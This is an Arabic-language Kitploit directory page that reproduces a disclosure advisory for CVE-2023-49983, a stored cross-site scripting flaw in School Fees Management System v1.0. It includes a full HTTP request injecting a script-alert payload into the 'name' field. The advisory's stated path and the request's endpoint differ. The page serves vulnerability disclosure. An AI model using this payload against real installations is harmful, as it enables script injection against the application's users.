Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-49983 — نظام إدارة الرسوم المدرسية v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في حقل/معامل "name" على "/management/class" | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-49983
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubgeraldoalcantara/cve-2023-49983

CVE-2023-49983

نظام إدارة الرسوم المدرسية v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في حقل/معامل "name" على "/management/class"

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-49983

School Fees Management System v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في حقل/معامل "name" في "/management/class"

الوصف: تسمح ثغرة البرمجة النصية عبر المواقع (XSS) في المكوّن "/management/class" من نظام إدارة الرسوم المدرسية الإصدار v1.0 للمهاجمين بتنفيذ نصوص ويب أو HTML عشوائية عبر حمولة ضارة محقونة في معامل name.

إصدار المنتج المعرّض للثغرة: School Fees Management System v1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 28/11/2023
تم التأكيد في: 19/12/2023
CVE: CVE-2023-49983
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

لاستغلال الثغرة، يجب على المستخدم الذي يمتلك الصلاحيات المناسبة الوصول إلى صفحة "/ci_fms/admin/management/class". في هذه الصفحة، يجب على المستخدم إما تعديل فصل قائم أو إضافة فصل جديد. يجب إدراج الحمولة الضارة في معامل "name" أثناء هذه العملية.

الطلب:

POST /ci_fms/admin/action/edit_student/1/1 HTTP/1.1
Host: 192.168.68.148
Content-Length: 268
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydFBWs52W42v8XLGe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/enrollment/class/1
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=c561k45qbrtsb34f2k30f936v0aijl01
Connection: close

------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="parent"

1
------WebKitFormBoundarydFBWs52W42v8XLGe--

المكتشف(ون)/الإشادات:
Geraldo Alcântara

تنزيل الأداة